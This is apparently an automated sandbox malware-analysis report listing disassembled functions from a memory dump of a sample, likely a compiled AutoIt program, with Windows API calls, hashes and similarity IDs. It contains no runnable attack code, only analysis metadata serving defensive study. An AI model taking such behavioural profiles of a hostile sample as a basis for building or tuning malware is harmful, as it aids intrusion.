                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: AllocateHeap_free
                                                            • String ID:
                                                            • API String ID: 614378929-0
                                                            • Opcode ID: 0a4238c5169a7231aaa4f24da03c23c498f35c1c03b83c5aa53f86371353cdbc
                                                            • Instruction ID: ce4c4a4f6ae6ac9c23ba639ef73e959748876b99050cf4bd685d6115106a07c8
                                                            • Opcode Fuzzy Hash: 0a4238c5169a7231aaa4f24da03c23c498f35c1c03b83c5aa53f86371353cdbc
                                                            • Instruction Fuzzy Hash: 6B11A372504B19AFDB612F74BC4577F37989B04361B24092AFE4D9A2D4DE30C944ABB2
                                                            Function 00CD44A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00CD44CF
                                                              • Part of subcall function 00CD407C: _memset.LIBCMT ref: 00CD40FC
                                                              • Part of subcall function 00CD407C: _wcscpy.LIBCMT ref: 00CD4150
                                                              • Part of subcall function 00CD407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00CD4160
                                                            • KillTimer.USER32(?,00000001,?,?), ref: 00CD4524
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00CD4533
                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00D0D4B9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                            • String ID:
                                                            • API String ID: 1378193009-0
                                                            • Opcode ID: b0b421f939d88167e6865e2bbc57cb3b752ebd25992b3dba212845c91444ccc1
                                                            • Instruction ID: e08712b20e22514fa22e0adfe4d2d52402a386a23b5613e131fcaaf01ed4408f
                                                            • Opcode Fuzzy Hash: b0b421f939d88167e6865e2bbc57cb3b752ebd25992b3dba212845c91444ccc1
                                                            • Instruction Fuzzy Hash: 04210770504784AFE732DB649855BEBBBEC9F05305F04009FE79E9A281D3746A84DB61
                                                            Function 00D46369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00D37896,?,?,00000000), ref: 00CD5A2C
                                                              • Part of subcall function 00CD5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00D37896,?,?,00000000,?,?), ref: 00CD5A50
                                                            • gethostbyname.WSOCK32(?), ref: 00D46399
                                                            • WSAGetLastError.WSOCK32(00000000), ref: 00D463A4
                                                            • _memmove.LIBCMT ref: 00D463D1
                                                            • inet_ntoa.WSOCK32(?), ref: 00D463DC
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                            • String ID:
                                                            • API String ID: 1504782959-0
                                                            • Opcode ID: 1c030b02bf2cf5090cd66905cf3a38ba994d30d7bdcf574615982e8502a1564a
                                                            • Instruction ID: 00e8a6504207c3920ce7114f9bac9b8ce75d1edaa9309df08c6e42d99ccebdd3
                                                            • Opcode Fuzzy Hash: 1c030b02bf2cf5090cd66905cf3a38ba994d30d7bdcf574615982e8502a1564a
                                                            • Instruction Fuzzy Hash: 8C112176500109AFCB04FFA4DD56CAE77B8EF05311B144066FA06AB261DB31DE14EB71
                                                            Function 00D28B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(?,000000B0,?,?), ref: 00D28B61
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D28B73
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D28B89
                                                            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D28BA4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: c4280713bced4471982d88eb963788acff68c0ee7c825666ddd8087bb0a0ce32
                                                            • Instruction ID: 5000de2e6838feee23fcf6082f46f4178603e3b6fddcf6042594368a0e568c93
                                                            • Opcode Fuzzy Hash: c4280713bced4471982d88eb963788acff68c0ee7c825666ddd8087bb0a0ce32
                                                            • Instruction Fuzzy Hash: FC112E79901218FFDB11DF95CC85F9EBBB4FB48710F204095E900B7250DA716E11EBA4
                                                            Function 00CD1290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CD2612: GetWindowLongW.USER32(?,000000EB), ref: 00CD2623
                                                            • DefDlgProcW.USER32(?,00000020,?), ref: 00CD12D8
                                                            • GetClientRect.USER32(?,?), ref: 00D0B5FB
                                                            • GetCursorPos.USER32(?), ref: 00D0B605
                                                            • ScreenToClient.USER32(?,?), ref: 00D0B610
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Client$CursorLongProcRectScreenWindow
                                                            • String ID:
                                                            • API String ID: 4127811313-0
                                                            • Opcode ID: f284210446f3fc76e693db9910bfe176a001ef3e40608dddf3cf19d2b0b957a6
                                                            • Instruction ID: f25f30ef74856d80910f6fc6f17c3e4f07d30ea13ed87b5e9915bb96739a447b
                                                            • Opcode Fuzzy Hash: f284210446f3fc76e693db9910bfe176a001ef3e40608dddf3cf19d2b0b957a6
                                                            • Instruction Fuzzy Hash: 02112235A00219BBCB00EFA9D8899AE7BB9EB05302F540466FE01E7240D731AA519BB5
                                                            Function 00D31142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00D2FCED,?,00D30D40,?,00008000), ref: 00D3115F
                                                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00D2FCED,?,00D30D40,?,00008000), ref: 00D31184
                                                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00D2FCED,?,00D30D40,?,00008000), ref: 00D3118E
                                                            • Sleep.KERNEL32(?,?,?,?,?,?,?,00D2FCED,?,00D30D40,?,00008000), ref: 00D311C1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CounterPerformanceQuerySleep
                                                            • String ID:
                                                            • API String ID: 2875609808-0
                                                            • Opcode ID: c183fe0054e84582db233857a158a1d54671a3383fcfe2897586f296ce25c19f
                                                            • Instruction ID: 363ea2121458845756fc9af7308367ab0a74b58ea87ec49d5bb911e558a1d916
                                                            • Opcode Fuzzy Hash: c183fe0054e84582db233857a158a1d54671a3383fcfe2897586f296ce25c19f
                                                            • Instruction Fuzzy Hash: 6A113C35D01B1ED7CF00AFA5D848AEEBBB8FF19711F044055EA85B6240CB709550CBB5
                                                            Function 00D2D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00D2D84D
                                                            • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00D2D864
                                                            • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00D2D879
                                                            • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00D2D897
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Type$Register$FileLoadModuleNameUser
                                                            • String ID:
                                                            • API String ID: 1352324309-0
                                                            • Opcode ID: efae728b38c0a623a8af37b2fac4f5d5fb05ad265db82d52bccb0b047530a92f
                                                            • Instruction ID: 210f08aec08d36f0d78e1665c0eb3da91e06f7a56cdd897f2cf9d63441966d30
                                                            • Opcode Fuzzy Hash: efae728b38c0a623a8af37b2fac4f5d5fb05ad265db82d52bccb0b047530a92f
                                                            • Instruction Fuzzy Hash: 3D116175605324DBE3208F50EC08F93FBBDEB00B05F10856AAA96DA150D7B0E549DBB1
                                                            Function 00D06FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                            • String ID:
                                                            • API String ID: 3016257755-0
                                                            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                            • Instruction ID: 0e1a78a9983118223da0195551f04bf1ebb0840ee48186d830b6ac90a61286e0
                                                            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                            • Instruction Fuzzy Hash: D1017B3284814EBBCF225E84CC01DEE3F76BB18391F488515FA5C580B0C236E9B1ABA1
                                                            Function 00D5B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowRect.USER32(?,?), ref: 00D5B2E4
                                                            • ScreenToClient.USER32(?,?), ref: 00D5B2FC
                                                            • ScreenToClient.USER32(?,?), ref: 00D5B320
                                                            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D5B33B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ClientRectScreen$InvalidateWindow
                                                            • String ID:
                                                            • API String ID: 357397906-0
                                                            • Opcode ID: 40198b45221893ebf98a17d10506ec898de4906f2ff73db6d5951d9d75615328
                                                            • Instruction ID: ab024dfb358dd622ce53a43fec0032b38ff2235fe6a4829fde7630d74b26a36e
                                                            • Opcode Fuzzy Hash: 40198b45221893ebf98a17d10506ec898de4906f2ff73db6d5951d9d75615328
                                                            • Instruction Fuzzy Hash: 2C1143B9D00209EFDB41CFA9C8849EEBBB9FB08311F108166E914E3220D735AA558F60
                                                            Function 00D5B635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _memset.LIBCMT ref: 00D5B644
                                                            • _memset.LIBCMT ref: 00D5B653
                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00D96F20,00D96F64), ref: 00D5B682
                                                            • CloseHandle.KERNEL32 ref: 00D5B694
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: _memset$CloseCreateHandleProcess
                                                            • String ID:
                                                            • API String ID: 3277943733-0
                                                            • Opcode ID: 52e9e2c6f09d18f0dea197b4e9c25df96f59507de81f960369e43682ba8dcf8f
                                                            • Instruction ID: 1425bdcf6472b42d1814e87b6b493fa8080dc0b994812696371cafc29183f835
                                                            • Opcode Fuzzy Hash: 52e9e2c6f09d18f0dea197b4e9c25df96f59507de81f960369e43682ba8dcf8f
                                                            • Instruction Fuzzy Hash: B6F0DAB25403047AF7102F65BC06FBB7A9CEF09795F004022FB08E92A2D775981097B9
                                                            Function 00D36BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • EnterCriticalSection.KERNEL32(?), ref: 00D36BE6
                                                              • Part of subcall function 00D376C4: _memset.LIBCMT ref: 00D376F9
                                                            • _memmove.LIBCMT ref: 00D36C09
                                                            • _memset.LIBCMT ref: 00D36C16
                                                            • LeaveCriticalSection.KERNEL32(?), ref: 00D36C26
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CriticalSection_memset$EnterLeave_memmove
                                                            • String ID:
                                                            • API String ID: 48991266-0
                                                            • Opcode ID: 18bae4afd2320a99e7a3732d6abd8a04f17448f7c739613aadc68e1c9e40d1fe
                                                            • Instruction ID: 6324193bd4311bfd04dec48cd92ead390f6cbde71c6cb22c0519812b421851e6
                                                            • Opcode Fuzzy Hash: 18bae4afd2320a99e7a3732d6abd8a04f17448f7c739613aadc68e1c9e40d1fe
                                                            • Instruction Fuzzy Hash: 1DF05E7A200204ABCF416F55DC85A8ABB2AEF45361F048061FE099E227CB31E811DBB5
                                                            Function 00CD2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSysColor.USER32(00000008), ref: 00CD2231
                                                            • SetTextColor.GDI32(?,000000FF), ref: 00CD223B
                                                            • SetBkMode.GDI32(?,00000001), ref: 00CD2250
                                                            • GetStockObject.GDI32(00000005), ref: 00CD2258
                                                            • GetWindowDC.USER32(?,00000000), ref: 00D0BE83
                                                            • GetPixel.GDI32(00000000,00000000,00000000), ref: 00D0BE90
                                                            • GetPixel.GDI32(00000000,?,00000000), ref: 00D0BEA9
                                                            • GetPixel.GDI32(00000000,00000000,?), ref: 00D0BEC2
                                                            • GetPixel.GDI32(00000000,?,?), ref: 00D0BEE2
                                                            • ReleaseDC.USER32(?,00000000), ref: 00D0BEED
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                            • String ID:
                                                            • API String ID: 1946975507-0
                                                            • Opcode ID: b60c78b8e8801a453e1ec0f2a6ac2614eeb475b9c4e099a89d86b048df048111
                                                            • Instruction ID: bde5d1cff04341fbb44365558474dadc145399ba2eac59aa1d2a5d0e7ec2502f
                                                            • Opcode Fuzzy Hash: b60c78b8e8801a453e1ec0f2a6ac2614eeb475b9c4e099a89d86b048df048111
                                                            • Instruction Fuzzy Hash: ABE03932104744AADB215F64EC0DBD87F10EB15332F048366FEA9981E187724980DB22
                                                            Function 00D28712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetCurrentThread.KERNEL32 ref: 00D2871B
                                                            • OpenThreadToken.ADVAPI32(00000000,?,?,?,00D282E6), ref: 00D28722
                                                            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00D282E6), ref: 00D2872F
                                                            • OpenProcessToken.ADVAPI32(00000000,?,?,?,00D282E6), ref: 00D28736
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: CurrentOpenProcessThreadToken
                                                            • String ID:
                                                            • API String ID: 3974789173-0
                                                            • Opcode ID: 153a26852acac81ee9aea67b475fe373542da9d08f7185d2063e80dcb254d7c3
                                                            • Instruction ID: fe81e0532f933df5f691811a444dabe301c1231a30be4c8fc0340f204e38c0ba
                                                            • Opcode Fuzzy Hash: 153a26852acac81ee9aea67b475fe373542da9d08f7185d2063e80dcb254d7c3
                                                            • Instruction Fuzzy Hash: CBE04F766123219BE7605FB46D0CB573BA8EF607D6F184828AA45CE080DA2484419770
                                                            Function 00D2B2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • OleSetContainedObject.OLE32(?,00000001), ref: 00D2B4BE
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: ContainedObject
                                                            • String ID: AutoIt3GUI$Container
                                                            • API String ID: 3565006973-3941886329
                                                            • Opcode ID: 84280735f248d2b0093f86c07d0721849fc7483ef394274b67ec59c83b265f22
                                                            • Instruction ID: 17bc20337f3e5eb82d6b0c97a492110ef488cba858695a19543beb482c9439e1
                                                            • Opcode Fuzzy Hash: 84280735f248d2b0093f86c07d0721849fc7483ef394274b67ec59c83b265f22
                                                            • Instruction Fuzzy Hash: EB916970600611AFDB14DF64D884A6ABBE5FF58724F24856EE94ACF391DBB0E841CB60
                                                            Function 00D3AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00CEFC86: _wcscpy.LIBCMT ref: 00CEFCA9
                                                              • Part of subcall function 00CD9837: __itow.LIBCMT ref: 00CD9862
                                                              • Part of subcall function 00CD9837: __swprintf.LIBCMT ref: 00CD98AC
                                                            • __wcsnicmp.LIBCMT ref: 00D3B02D
                                                            • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00D3B0F6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396571782.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396603915.0000000000D97000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_cd0000_gH3LlhcRzg.jbxd
                                                            Similarity
                                                            • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                            • String ID: LPT
                                                            • API String ID: 3222508074-1350329615
                                                            • Opcode ID: eec31486fe3d5f081ded72535e395cc5e74e15cd2dfb63c9d13bcd444bae03a0
                                                            • Instruction ID: a8d6716683176d043ce3ee43998619e3446618a3bd9919b24668273cb9cf0b83
                                                            • Opcode Fuzzy Hash: eec31486fe3d5f081ded72535e395cc5e74e15cd2dfb63c9d13bcd444bae03a0
                                                            • Instruction Fuzzy Hash: D3618675E00219AFCB14DF94C851EAEB7B4EF09710F14405AFA56AB391D770EE44DB60
                                                            Function 00CE2957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • Sleep.KERNEL32(00000000), ref: 00CE2968
                                                            • GlobalMemoryStatusEx.KERNEL32(?), ref: 00CE2981
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1396407456.0000000000CD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1396373062.0000000000CD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D5F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1396490666.0000000000D84000.00000002.00000001.01000000.00000003.sdmpDownload File
